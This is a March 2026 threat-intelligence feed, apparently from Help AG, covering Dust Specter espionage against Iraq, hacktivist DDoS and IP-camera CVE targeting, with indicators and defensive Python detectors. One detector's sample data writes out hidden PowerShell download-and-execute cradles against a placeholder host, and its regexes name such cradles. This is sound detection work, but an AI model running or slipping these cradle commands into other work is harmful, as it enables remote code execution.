SHA-1: 8735ee29c409b8d101eb3170f011455be41b7a91
SHA-256: 3a66ae5942f6feb79cf81ee70451f761253e0e0bde95f0840abdd42a804fad39
Domains: lecturegenieltd[.]pro; meetingapp[.]site; afterworld[.]store; girlsbags[.]shop; onlinepettools[.]shop; web14[.]info; web27[.]info
A cyber-espionage campaign targeting government officials through social-engineering lures such as fake government documents and meeting invitations. The intrusion delivers previously undocumented .NET-based malware families enabling command execution, file transfer, and remote system control through command-and-control infrastructure. Observed techniques include DLL sideloading, PowerShell execution, registry modification, delayed execution, and obfuscated network communication. The activity indicates a targeted intelligence-gathering operation using compromised infrastructure and advanced evasion methods.
SPLITDROP; TWINTASK; TWINTALK; GHOSTFORM
Iraq
Dust Specter (suspected state-linked)
Government, Administration
T1583.001 – Acquire Infrastructure: Domains; T1587.001 – Develop Capabilities: Malware; T1204.004 – User Execution: Malicious Copy and Paste; T1112 – Modify Registry; T1574.002 – Hijack Execution Flow: DLL Side-Loading; T1071.001 – Application Layer Protocol: Web Protocols
High
Implement application allow-listing to prevent unauthorized DLL sideloading; block password-protected archives from unverified senders; enable PowerShell script block logging and monitor registry Run keys for persistence; inspect outbound HTTPS traffic for anomalous URI patterns or unusual authentication headers; regularly patch systems and maintain updated endpoint protection; conduct user awareness training to identify phishing attempts.
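To operationalise the indicator list for this entry, the hashes and defanged domains have to be typed, normalised (mixed-case hashes, [.] defanging) and matched against telemetry. The following added example is not code from Help AG or from the original reporting; it parses a subset of the published indicators exactly as they appear above, then matches them against a constructed proxy log and file-hash inventory whose formats are assumptions for illustration. The subdomain match is deliberate: the feed lists apex domains, and a subdomain of one of them should still hit, while a look-alike domain that merely ends in the same characters should not.

```python
"""Parse the indicator cell above into typed IoCs and match them against telemetry.

Added example, not part of the Help AG feed. RAW_IOC_CELL carries a subset
of the indicators listed for this campaign, exactly as published (defanged
domains, mixed-case hashes). The proxy log lines and file-hash inventory
are constructed; their formats are assumptions, not a real product's.
"""
import re
from collections import defaultdict

RAW_IOC_CELL = (
    "b8254efd859f5420f1ce4060e4796c08 8621be9e1aa730d1ac8eb06fa8f66d9da70ff293 "
    "903f7869a94d88d43b9140bb656f7bb86ef725efc78ef2ff9d12fd7c7c2aca74 "
    "78275f3fc7e209b85bff6a6f99acc68a Fc08f8403849c6233978a363f4cdc58cd7041823 "
    "6bb0d45799076b3f2d7f602b978a0779868fc72a1188374f6919fbbfba23efce "
    "d5ddf40ba2506c57d3087d032d733e08 682c043443cb81b6c2fde8c5df43333f5d1fec53 "
    "797325b3c8a9356dcace75d93cb5cfb7847d2049c66772d4cc2cee821618cb96 "
    "lecturegenieltd[.]pro meetingapp[.]site afterworld[.]store girlsbags[.]shop "
    "onlinepettools[.]shop web14[.]info web27[.]info"
)

HEX = "[0-9a-fA-F]"
# Order matters: hashes are tested before the (looser) domain pattern.
PATTERNS = [
    ("md5", re.compile(rf"^{HEX}{{32}}$")),
    ("sha1", re.compile(rf"^{HEX}{{40}}$")),
    ("sha256", re.compile(rf"^{HEX}{{64}}$")),
    ("domain", re.compile(r"^(?:[a-z0-9-]+(?:\[\.\]|\.))+[a-z]{2,}$", re.I)),
]
HASH_KIND_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}


def refang(token):
    return token.replace("[.]", ".").replace("hxxp", "http")


def defang(host):
    return host.replace(".", "[.]")


def parse_iocs(cell):
    """Split a whitespace-separated indicator cell into ({kind: set(normalised)}, unrecognised)."""
    iocs = defaultdict(set)
    unrecognised = []
    for token in cell.split():
        for kind, rx in PATTERNS:
            if rx.match(token):
                iocs[kind].add(refang(token).lower())
                break
        else:
            unrecognised.append(token)
    return iocs, unrecognised


def host_matches(host, domains):
    """Exact match or subdomain of a listed domain, on a label boundary."""
    h = host.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in domains)


def match_proxy_log(lines, iocs):
    """Constructed line format: '<ts> <src_ip> <method> <host> <path> <status>'."""
    hits = []
    for line in lines:
        ts, src, _method, host, _path, _status = line.split()
        if host_matches(host, iocs["domain"]):
            hits.append((ts, src, host))
    return hits


def match_hashes(inventory, iocs):
    """inventory: (path, hex digest) pairs from EDR/file scans; digest type inferred by length."""
    hits = []
    for path, digest in inventory:
        kind = HASH_KIND_BY_LEN.get(len(digest))
        if kind and digest.lower() in iocs[kind]:
            hits.append((path, kind))
    return hits


def blocklist(iocs):
    """Domains re-defanged for safe sharing in a ticket or report."""
    return sorted(defang(d) for d in iocs["domain"])


# Constructed telemetry.
PROXY_LOG = [
    "2026-03-10T09:12:01Z 10.20.4.17 GET cdn.girlsbags.shop /api/v1/poll 200",
    "2026-03-10T09:12:05Z 10.20.4.18 GET www.example.com / 200",
    "2026-03-10T09:13:40Z 10.20.4.17 POST meetingapp.site /upload 200",
    "2026-03-10T09:14:02Z 10.20.4.19 GET fakemeetingapp.site / 200",
]
FILE_INVENTORY = [
    ("C:\\Users\\j.doe\\Downloads\\Agenda.dll", "B8254EFD859F5420F1CE4060E4796C08"),
    ("C:\\Windows\\notepad.exe", "0" * 64),
]

if __name__ == "__main__":
    iocs, unknown = parse_iocs(RAW_IOC_CELL)
    print({k: len(v) for k, v in iocs.items()}, "unrecognised:", unknown)
    print(match_proxy_log(PROXY_LOG, iocs))
    print(match_hashes(FILE_INVENTORY, iocs))
    print(blocklist(iocs))
```

Anything left in the unrecognised list is worth a second look before loading the feed into a blocklist: a truncated hash or a stray token would otherwise silently never match.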
Cyber Threat Escalation / Early Warning
No IoCs reported.
Threat intelligence reporting indicates a heightened risk of destructive cyber activity following ongoing geopolitical tensions. Analysts assess that cyber operations may focus on critical infrastructure sectors, including energy, transportation, communications, government, finance, water, and healthcare. The anticipated activity may prioritize disruptive or destructive actions rather than intelligence collection, potentially accompanied by information manipulation campaigns. While large-scale systemic disruption is considered less likely, organizations with exposed or poorly protected infrastructure may face increased targeting risk.
Not specified
Multiple regions
State-linked actors (not specified)
Energy, Finance, IT, Government, Healthcare, Transportation, Water
T1485 – Data Destruction; T1490 – Inhibit System Recovery; T1562.001 – Impair Defenses: Disable or Modify Tools
Medium
Strengthen defenses across critical infrastructure environments; review and update incident response and business continuity plans; ensure strong network segmentation and secure backups; enhance monitoring for abnormal system behavior; conduct vulnerability management and patching for internet-exposed systems; maintain executive awareness and ongoing threat intelligence monitoring.

Mar 4, 2026

Campaign
IoC
Campaign Scope
Malware/ Tools
Targeted Country
Threat Actor
Sector
MITRE ATT&CK Techniques
Threat Severity
Recommendation
AI-Enabled Cyber Operations / Emerging Threat Landscape
No specific IoCs reported.
Threat intelligence reporting highlights the increasing use of AI to automate cyber operations, enabling rapid exploit development, network reconnaissance, phishing campaigns, and deepfake-enabled social engineering. Nation-state actors and cybercriminal groups are leveraging AI and Living-off-the-Land (LotL) techniques to conceal malicious activity within trusted cloud services and accelerate attack timelines. The report also notes a rise in token theft campaigns and large-scale DDoS attacks reaching record traffic volumes.
LummaC2; Aisuru; Cloud service abuse (Google Drive, Microsoft Teams, Amazon S3)
Not specified
Salt Typhoon; Linen Typhoon; FrumpyToad; PunyToad; NastyShrew; PatheticSlug; CrustyKrill
IT; Government; Telecommunications; Finance
T1566 – Phishing; T1078 – Valid Accounts; T1528 – Steal Application Access Token; T1190 – Exploit Public-Facing Application; T1027 – Obfuscated Files or Information; T1059.001 – Command and Scripting Interpreter: PowerShell; T1071.001 – Application Layer Protocol: Web Protocols
High
Deploy autonomous and AI-assisted defense capabilities; enforce strong email authentication controls (DMARC, DKIM, SPF); implement Zero Trust access policies across SaaS platforms; continuously audit third-party API integrations; strengthen monitoring for token theft and suspicious cloud service activity; conduct proactive threat hunting and maintain robust incident response procedures.
Operation Epic Fury / Cyber Conflict Escalation Advisory
N/A
Following the launch of Operation Epic Fury on February 28, 2026, involving coordinated military and cyber operations, analysts assess an increased likelihood of retaliatory cyber activity and disruptive operations linked to the geopolitical escalation. While no specific malware or threat actors have been confirmed, the conflict raises the probability of cyber espionage, disruption, and destructive attacks targeting government systems, energy infrastructure, and military-related organizations.
N/A
Iran; United States; Israel; Middle East
Not attributed
Government; Military; Energy
Potential techniques may include Phishing (T1566), Exploit Public-Facing Application (T1190), and Valid Accounts (T1078)
High
Review and test incident response plans for nation-state attack scenarios; enforce multi-factor authentication and strong access controls; strengthen network segmentation and monitoring; patch critical vulnerabilities promptly; conduct proactive threat hunting and share threat intelligence with trusted partners to detect potential retaliatory cyber operations.
Cyber Espionage / AI-Assisted Malware Campaign
No specific IoCs reported.
Targeted campaign against Iraqi government officials leveraging phishing and social engineering to deliver AI-assisted custom .NET malware. The attack chains combine DLL sideloading, in-memory PowerShell execution, and ClickFix-style lures impersonating Iraq’s Ministry of Foreign Affairs. Attackers also leveraged compromised government infrastructure to increase credibility and deliver payloads, suggesting a coordinated espionage effort designed to evade detection and maintain persistence.
Custom .NET malware; PowerShell; DLL sideloading
Iraq
Dust Specter (Iran-linked)
Government
T1566.001 – Spearphishing Attachment; T1204.004 – User Execution: Malicious Copy and Paste; T1059.001 – Command and Scripting Interpreter: PowerShell; T1574.002 – Hijack Execution Flow: DLL Side-Loading; T1105 – Ingress Tool Transfer
High
Deploy advanced email filtering and phishing detection; use EDR solutions to detect DLL sideloading and in-memory execution; regularly patch systems and applications; strengthen network segmentation; conduct targeted security awareness training for government personnel; monitor networks for suspicious behavior and anomalous PowerShell activity.
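The ClickFix-style lures and anomalous PowerShell activity this entry asks teams to monitor leave two recoverable artefacts: a powershell.exe process whose parent is explorer.exe (the Run dialog) and whose command line carries a download cradle, inline execution or an encoded command, and the pasted command itself in the user's RunMRU registry key. The following added example (not code from Help AG or the reporting vendor) scores constructed Sysmon-style process and registry events for those traits and decodes -EncodedCommand payloads before scanning them. The lure hostname uses the reserved .invalid TLD and is not an indicator from the feed; the field names mirror Sysmon EID 1 and EID 13 and should be mapped to your own telemetry.

```python
"""Heuristics for ClickFix-style PowerShell execution in process and registry telemetry.

Added example, not code from the Help AG feed. Events are constructed to
resemble Sysmon EID 1 (process create) and EID 13 (registry value set)
fields; adapt the keys to your source. The lure domain is a placeholder
(.invalid TLD) and not an indicator from the feed.
"""
import base64
import ntpath
import re

# Download cradles, inline execution and stealth switches commonly pasted by ClickFix lures.
CRADLE = re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|start-bitstransfer)\b|net\.webclient", re.I)
EXEC = re.compile(r"\biex\b|invoke-expression", re.I)
STEALTH = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b|-nop\b|-noprofile\b|-noni\b|-(?:ep|executionpolicy)\s+bypass\b", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
RUNMRU = "\\software\\microsoft\\windows\\currentversion\\explorer\\runmru\\"


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload behind -EncodedCommand, or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_powershell(cmdline, parent_image):
    """One point per independent ClickFix indicator; the decoded payload is scanned too."""
    reasons = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded-command")
        text = f"{cmdline} {decoded}"
    if CRADLE.search(text):
        reasons.append("download-cradle")
    if EXEC.search(text):
        reasons.append("inline-execution")
    if STEALTH.search(text):
        reasons.append("stealth-switches")
    if ntpath.basename(parent_image).lower() == "explorer.exe":
        # The Win+R Run dialog is hosted by explorer.exe, so a pasted command inherits it as parent.
        reasons.append("parent-explorer")
    return len(reasons), reasons


def runmru_hits(registry_events):
    """Run-dialog history (RunMRU) entries that launch an interpreter are a ClickFix artefact."""
    hits = []
    for ev in registry_events:
        if RUNMRU in ev["TargetObject"].lower() and re.search(r"powershell|pwsh|mshta|cmd\b", ev["Details"], re.I):
            hits.append(ev["Details"])
    return hits


def hunt(process_events, registry_events, threshold=3):
    flagged = []
    for ev in process_events:
        if ntpath.basename(ev["Image"]).lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        score, reasons = score_powershell(ev["CommandLine"], ev["ParentImage"])
        if score >= threshold:
            flagged.append((ev["CommandLine"], score, reasons))
    return {"processes": flagged, "runmru": runmru_hits(registry_events)}


# Constructed samples. The encoded variant is built here so the base64 is valid.
ENCODED_PAYLOAD = base64.b64encode(
    "iex (irm https://mfa-verify.invalid/a)".encode("utf-16-le")).decode()
SAMPLE_PROCESS_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (irm https://mfa-verify.invalid/verify)"'},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": f"powershell -e {ENCODED_PAYLOAD}"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd /c dir"},
]
SAMPLE_REGISTRY_EVENTS = [
    {"TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a",
     "Details": 'powershell -w hidden -c "iwr https://mfa-verify.invalid/v | iex"\\1'},
    {"TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\b",
     "Details": "notepad\\1"},
]

if __name__ == "__main__":
    result = hunt(SAMPLE_PROCESS_EVENTS, SAMPLE_REGISTRY_EVENTS)
    for cmd, score, reasons in result["processes"]:
        print(score, reasons, cmd[:60])
    print("RunMRU:", result["runmru"])
```

Scheduled scripts that run with -ExecutionPolicy Bypass score one point and stay below the threshold, which is the intended behaviour: the signal is the combination of an interactive parent, a cradle and concealment, not any single switch. Script Block Logging (Event ID 4104) gives the same decoded content at execution time and is the better source where it is enabled.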
Cyber Activity Surge / Conflict-Related Threat Landscape
No IoCs reported.
Increased cyber activity has been observed following recent geopolitical tensions, including hacktivist-style activity, psychological operations, opportunistic phishing campaigns, and exploitation of public-facing systems. Some incidents include application defacement, broadcast intrusions, and temporary internet connectivity disruptions, while other threat actors appear to be leveraging the broader conflict as a theme for phishing and malware distribution. Analysts highlight a potential delayed activation pattern, where initial access may be established in advance and used later for disruptive or destructive operations.
Not specified
Middle East region
Not attributed
Finance, Energy, IT, Government
T1566 – Phishing; T1190 – Exploit Public-Facing Application; T1562 – Impair Defenses; T1485 – Data Destruction; T1486 – Data Encrypted for Impact; T1133 – External Remote Services
Medium
Strengthen cyber hygiene through timely patching and vulnerability management; enforce multi-factor authentication (MFA) across remote access services; reduce exposure of internet-facing systems; maintain regular security awareness training; implement strong backup and recovery procedures; leverage security monitoring tools such as SIEM, NDR, and deception technologies; enhance threat intelligence sharing and continuous exposure monitoring.
Hacktivism / Distributed Denial-of-Service (DDoS) Campaign
No IoCs reported.
A surge in hacktivist cyber activity has been observed following escalating regional tensions, with 149 DDoS attacks impacting approximately 110 organizations across 16 countries within a short time frame. The activity appears coordinated and primarily focused on service disruption rather than long-term compromise. Analysts note that a small number of hacktivist groups were responsible for a significant portion of the attacks, indicating organized campaigns leveraging DDoS techniques to disrupt online services and increase visibility during the broader conflict environment.
DDoS attack infrastructure
Multiple regions
Keymous+; DieNet
Multiple sectors
T1498 – Network Denial of Service; T1499 – Endpoint Denial of Service; T1190 – Exploit Public-Facing Application; T1566 – Phishing (potential initial access)
Medium
Deploy DDoS mitigation services and traffic filtering; monitor network traffic for abnormal spikes and volumetric attacks; maintain updated incident response procedures for service disruption scenarios; regularly patch internet-facing systems; strengthen security awareness programs to reduce phishing risks; implement centralized logging and monitoring to quickly detect coordinated attack activity.
Cyber Espionage Campaign / Spear-Phishing Intrusion
No IoCs reported
A targeted cyber-espionage campaign against government officials using social-engineering lures such as password-protected archives disguised as official documents and fake online forms to deliver newly observed malware families. The intrusion chain uses DLL sideloading through legitimate applications, PowerShell execution, registry persistence, and encrypted command-and-control communications. The malware supports remote command execution, file transfer, and system control. Analysts also noted indicators suggesting automated or AI-assisted malware development techniques within the tooling used in the campaign.
SPLITDROP; TWINTASK; TWINTALK; GHOSTFORM
Iraq
Dust Specter (suspected state-linked)
Government
T1566 – Phishing; T1204 – User Execution; T1059.001 – Command and Scripting Interpreter: PowerShell; T1574.002 – Hijack Execution Flow: DLL Side-Loading; T1105 – Ingress Tool Transfer; T1071.001 – Application Layer Protocol: Web Protocols; T1027 – Obfuscated Files or Information
High
Implement application allow-listing to prevent unauthorized DLL sideloading; block password-protected archives from untrusted senders; enable PowerShell script block logging and monitor registry persistence locations; inspect outbound HTTPS traffic for anomalous URI patterns or unusual authentication headers; maintain regular patching and endpoint monitoring; conduct user awareness training to reduce phishing risk.
Cyber Espionage & Infrastructure Targeting / Reconnaissance Activity
No IoCs reported
Threat intelligence reporting indicates an increase in cyber activity targeting critical infrastructure sectors, including manufacturing and transportation. The activity appears to focus on early-stage reconnaissance and network positioning, with attackers attempting to identify vulnerable systems and establish initial access that could later support espionage, disruption, or destructive operations. Observed techniques include default credential abuse, valid account exploitation, brute-force attempts, and network scanning to map target environments and identify exploitable services.
Not specified
Middle East region; Global organizations with regional exposure
MuddyWater; OilRig (APT34); APT33; UNC1549
Manufacturing, Transportation, Energy, Government, Finance, Aerospace, Aviation, Telecommunications
T1110 – Brute Force; T1078 – Valid Accounts; T1046 – Network Service Discovery; T1595 – Active Scanning
High
Reduce external attack surface by eliminating default credentials and restricting remote access services; enforce multi-factor authentication for privileged accounts; apply network segmentation and monitor lateral movement; prioritize patching of exposed vulnerabilities and monitor systems that cannot be patched; deploy continuous monitoring and anomaly detection for industrial and enterprise networks; leverage threat intelligence to detect reconnaissance and pre-positioning activity early.
Cyber Espionage / IoT Surveillance Targeting
CVE-2017-7921; CVE-2021-36260; CVE-2023-6895; CVE-2025-34067; CVE-2021-33044
Security researchers observed targeting of internet-exposed IP cameras across several Middle East countries, likely to support reconnaissance and situational monitoring during a period of heightened regional tensions. The activity involves attempts to exploit known vulnerabilities in surveillance devices manufactured by Hikvision and Dahua, potentially enabling unauthorized access to video feeds. Such access may provide attackers with visual intelligence and operational awareness, demonstrating how compromised IoT devices can be leveraged to support broader cyber or operational objectives.
Compromised IP cameras (Hikvision, Dahua)
Middle East region (including UAE, Qatar, Bahrain, Kuwait, Cyprus, Lebanon, Israel)
Not attributed
Government, Infrastructure, Surveillance systems
T1595 – Active Scanning; T1190 – Exploit Public-Facing Application; T1046 – Network Service Discovery; T1071 – Application Layer Protocol
High
Remove direct internet exposure for surveillance cameras; place devices behind VPN or zero-trust gateways; enforce strong unique credentials and disable default passwords; apply firmware updates and security patches; segment camera networks from corporate and operational systems; monitor logs for repeated authentication failures or abnormal outbound connections; replace unsupported or end-of-life devices.
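Two of the monitoring recommendations above, repeated authentication failures and abnormal outbound connections from cameras, can be checked directly against device logs. The following added example (not code from Help AG or the original researchers) applies a sliding-window threshold to constructed syslog-style login failures, so a slow trickle of operator typos does not alert but a burst from one source does, and compares each camera's outbound connections with an allow-list of the NVR and NTP endpoints it should be talking to. The log format, the addresses and the allow-list are assumptions built for the example; real Hikvision and Dahua firmware formats differ and the regexes must be adapted.

```python
"""Detect brute-force login attempts and unexpected egress in IP camera logs.

Added example, not part of the Help AG feed. The log lines are constructed
in a simple syslog-like format (camera firmware formats differ; adapt the
regexes); IP addresses are from documentation ranges. The allow-list of
expected destinations (NVR, NTP) is an assumption for the example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_RX = re.compile(r"^(?P<ts>\S+) (?P<cam>\S+) auth: login failed user=(?P<user>\S+) src=(?P<src>\S+)$")
EGRESS_RX = re.compile(r"^(?P<ts>\S+) (?P<cam>\S+) net: outbound connect dst=(?P<dst>[\d.]+):(?P<port>\d+)$")


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=2)):
    """Alert once per (camera, source) when >= threshold failures fall inside a sliding window."""
    recent = defaultdict(deque)   # (cam, src) -> timestamps of failures still inside the window
    alerted = set()
    alerts = []
    for line in lines:
        m = FAIL_RX.match(line)
        if not m:
            continue
        key = (m["cam"], m["src"])
        ts = parse_ts(m["ts"])
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:      # evict failures older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"camera": m["cam"], "src": m["src"], "failures": len(q), "at": m["ts"]})
    return alerts


def detect_unexpected_egress(lines, allowed):
    """A camera should only talk to its NVR/NTP; anything else is a candidate C2 or exfil path."""
    alerts = []
    for line in lines:
        m = EGRESS_RX.match(line)
        if m and (m["dst"], int(m["port"])) not in allowed:
            alerts.append({"camera": m["cam"], "dst": m["dst"], "port": int(m["port"])})
    return alerts


ALLOWED_EGRESS = {("10.10.0.5", 554), ("10.10.0.5", 8000), ("10.10.0.1", 123)}

SAMPLE_LOG = [
    # Six failures in 75 seconds from one source: brute force.
    "2026-03-02T01:00:05Z cam-lobby-01 auth: login failed user=admin src=203.0.113.7",
    "2026-03-02T01:00:20Z cam-lobby-01 auth: login failed user=admin src=203.0.113.7",
    "2026-03-02T01:00:35Z cam-lobby-01 auth: login failed user=admin src=203.0.113.7",
    "2026-03-02T01:00:50Z cam-lobby-01 auth: login failed user=root src=203.0.113.7",
    "2026-03-02T01:01:05Z cam-lobby-01 auth: login failed user=admin src=203.0.113.7",
    "2026-03-02T01:01:20Z cam-lobby-01 auth: login failed user=admin src=203.0.113.7",
    # Three failures spread over ten minutes: an operator mistyping, below threshold.
    "2026-03-02T01:10:00Z cam-gate-02 auth: login failed user=operator src=192.0.2.5",
    "2026-03-02T01:14:00Z cam-gate-02 auth: login failed user=operator src=192.0.2.5",
    "2026-03-02T01:19:00Z cam-gate-02 auth: login failed user=operator src=192.0.2.5",
    # Expected stream to the NVR, then an unexplained TLS connection to the internet.
    "2026-03-02T01:02:00Z cam-lobby-01 net: outbound connect dst=10.10.0.5:554",
    "2026-03-02T01:02:30Z cam-lobby-01 net: outbound connect dst=198.51.100.23:8443",
]

if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        print("BRUTE-FORCE", a)
    for a in detect_unexpected_egress(SAMPLE_LOG, ALLOWED_EGRESS):
        print("UNEXPECTED-EGRESS", a)
```

The egress check only works if camera traffic is actually logged, which in practice means a firewall or NetFlow collector on the segmented camera VLAN rather than the camera itself; a device that is directly internet-exposed, as in the activity described above, gives you neither the log nor the choke point.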

Mar 3, 2026

Campaign
IoC
Campaign Scope
Malware/ Tools
Targeted Country
Threat Actor
Sector
MITRE ATT&CK Techniques
Threat Severity
Recommendation
Hacktivism / Coordinated Cyber Activity
No IoCs reported.
Increased hacktivist activity has been observed amid ongoing geopolitical tensions, with multiple groups conducting cyber operations such as website defacements, distributed denial-of-service (DDoS) attacks, and limited data disclosures. Organizations perceived as linked to the wider conflict have been targeted. While the immediate operational impact has remained limited, the growing frequency of these incidents suggests potential for further escalation.
Not specified
Middle East region
Not attributed
Multiple sectors
T1498 – Network Denial of Service; T1491 – Defacement; T1190 – Exploit Public-Facing Application; T1566 – Phishing
Medium
Increase monitoring of public-facing applications and services; deploy DDoS mitigation and web application firewall (WAF) protections; regularly patch externally exposed systems and applications; enforce strong authentication and access controls; monitor website integrity for unauthorized changes; maintain updated incident response procedures and conduct user awareness training against phishing and social engineering.
Hybrid Conflict-Related Cyber Activity / Multi-Actor Operations
No IoCs reported.
Ongoing geopolitical tensions have led to an increase in hybrid cyber activity combining cyber intrusions, information manipulation, and opportunistic cybercrime. Observed activity includes phishing campaigns, credential theft, DDoS attacks, website defacements, and data theft operations carried out by a mix of state-linked actors, hacktivist groups, and financially motivated cybercriminals. Analysts note that the broader conflict environment is being leveraged by multiple actors to conduct disruptive cyber operations and opportunistic attacks across digital infrastructure.
RedAlert APK (mobile spyware referenced in related activity)
Middle East region
Multiple threat actors
Government, Military, Finance, IT
T1566 – Phishing; T1498 – Network Denial of Service; T1491 – Defacement; T1567 – Exfiltration Over Web Service (data theft); T1190 – Exploit Public-Facing Application
Medium
Strengthen monitoring for credential theft and phishing activity; implement robust DDoS mitigation and web application protections; enforce multi-factor authentication across critical systems; apply network segmentation to reduce lateral movement; conduct regular security audits and vulnerability management; enhance incident response preparedness and threat intelligence sharing to detect emerging hybrid cyber threats.
Critical Infrastructure Disruption / Physical–Digital Impact
No IoCs reported
Reports indicate physical attacks targeting data center infrastructure in the Gulf region, leading to temporary disruption of cloud services relied upon by organizations across multiple sectors. The incident highlights the interdependency between physical infrastructure and digital services, where disruptions to data center facilities can impact availability of cloud platforms, enterprise applications, and online services. The situation demonstrates how kinetic events can have downstream digital and operational effects on cloud-dependent organizations.
Not specified
Gulf region (UAE, Bahrain)
Not attributed
IT, Cloud Services
T1499 – Endpoint/Service Disruption; T1485 – Data Destruction (service disruption impact); T1490 – Inhibit System Recovery
High
Review business continuity and disaster recovery plans for cloud service outages; implement geographically distributed infrastructure and failover mechanisms; enhance monitoring and alerting for service disruptions; maintain redundancy for critical workloads; conduct risk assessments covering both cyber and physical infrastructure dependencies; ensure incident response procedures address large-scale service availability incidents.
Cyber Risk Advisory / Heightened Threat Environment
No IoCs reported
Security researchers issued a “Shields Up” advisory highlighting increased cyber risk associated with an ongoing geopolitical conflict. The advisory emphasizes that organizations should anticipate potential disruptive cyber activity linked to the evolving situation. While no specific malware, campaigns, or threat actors were identified, the warning reflects a heightened threat environment where cyber operations may accompany broader geopolitical developments. Organizations are advised to increase vigilance, strengthen monitoring, and proactively prepare for potential cyber incidents.
Not specified
Not specified
Not specified
Cross-sector
N/A
Medium
Review and strengthen cybersecurity posture by enforcing multi-factor authentication, prioritizing patching of critical vulnerabilities, and increasing logging and monitoring across networks and endpoints. Validate incident response and disaster recovery plans, ensure reliable offline backups, reduce external attack surface, and maintain awareness of emerging threats through threat intelligence monitoring.
Cyber Threat Escalation / Multi-Actor Cyber Operations
No IoCs reported
Intelligence reporting highlights increased cyber activity associated with ongoing regional instability, including disruptive cyber operations targeting digital and physical infrastructure. Observed activity includes DDoS attacks, data exfiltration attempts, phishing campaigns, and potential destructive operations affecting cloud infrastructure and critical services. Multiple threat clusters appear to be operating concurrently, using varied techniques to disrupt services and gather intelligence during a period of heightened geopolitical tension. The evolving situation indicates a sustained risk of cyber disruption across infrastructure and enterprise networks globally.
Not specified
Global / Multiple regions
Multiple threat clusters
Energy, Finance, Government, Critical Infrastructure
T1566 – Phishing; T1567 – Exfiltration Over Web Service; T1190 – Exploit Public-Facing Application; T1498 – Network Denial of Service; T1485 – Data Destruction
High
Strengthen cyber resilience by reviewing incident response and business continuity plans; enforce multi-factor authentication and strict access controls; apply network segmentation to protect critical systems; maintain secure offline backups; enhance monitoring and anomaly detection across cloud and enterprise environments; prioritize patching of exposed vulnerabilities and leverage threat intelligence feeds to detect emerging threats.
State Cyber Operations / Strategic Cyber Warfare Activity
No IoCs reported
Public statements indicate that cyber operations are increasingly integrated with broader military strategies, highlighting the role of offensive cyber capabilities alongside traditional military actions. While specific technical details or targets were not disclosed, the development reflects the growing role of cyber operations as a strategic component of modern conflict, potentially involving disruption of systems, intelligence gathering, or defense impairment activities. The announcement signals a shift toward greater transparency regarding the operational importance of cyber capabilities in national security contexts.
Not specified
Not specified
State-linked actors
Government, Military
T1562.001 – Impair Defenses; T1005 – Data from Local System
Medium
Strengthen cyber resilience across critical systems through network segmentation and endpoint protection; deploy intrusion detection and prevention systems (IDS/IPS); enhance continuous monitoring and threat intelligence sharing; conduct regular security assessments and threat hunting exercises; integrate physical and cyber security planning to address hybrid threat scenarios.
Conflict-Related Cyber Activity Monitoring
No IoCs reported
Security researchers are monitoring cyber activity associated with an ongoing regional conflict. While large-scale cyber impacts have not yet been observed, minor incidents such as website defacements and small-scale distributed denial-of-service (DDoS) attacks have occurred. Analysts expect continued cyber espionage, disruptive operations, and potential hack-and-leak campaigns as the situation evolves. Opportunistic actors are also exploiting the situation for phishing and social-engineering campaigns. The activity currently appears regionally focused but may affect organizations indirectly through supply chains, partners, or exposed public-facing systems.
Not specified
Middle East (regional impact)
MuddyWater (suspected activity referenced)
Cross-sector
T1566 – Phishing; T1190 – Exploit Public-Facing Application
Medium
Strengthen security hygiene by enforcing multi-factor authentication and applying timely security patches. Increase monitoring for abnormal activity and protect public-facing assets with web application firewalls and DDoS mitigation. Conduct third-party risk assessments, particularly for suppliers or partners operating in affected regions. Provide employee awareness training on phishing and social-engineering attempts that may reference ongoing geopolitical events.
Threat Landscape Advisory / Increased Cyber Activity
No IoCs reported
Security researchers report an escalation in cyber activity associated with actors linked to Iran, including phishing campaigns, hacktivist operations, and financially motivated cybercrime. The activity reflects a broadening operational scope targeting multiple sectors and organizations globally. While specific tools, malware, or technical indicators were not detailed, analysts warn of a potential increase in disruptive or destructive cyber operations as geopolitical tensions continue. The advisory highlights the need for heightened vigilance and proactive defensive measures across enterprise environments.
Not specified
Not specified
Not specified
Cross Sector
T1566 – Phishing
Medium
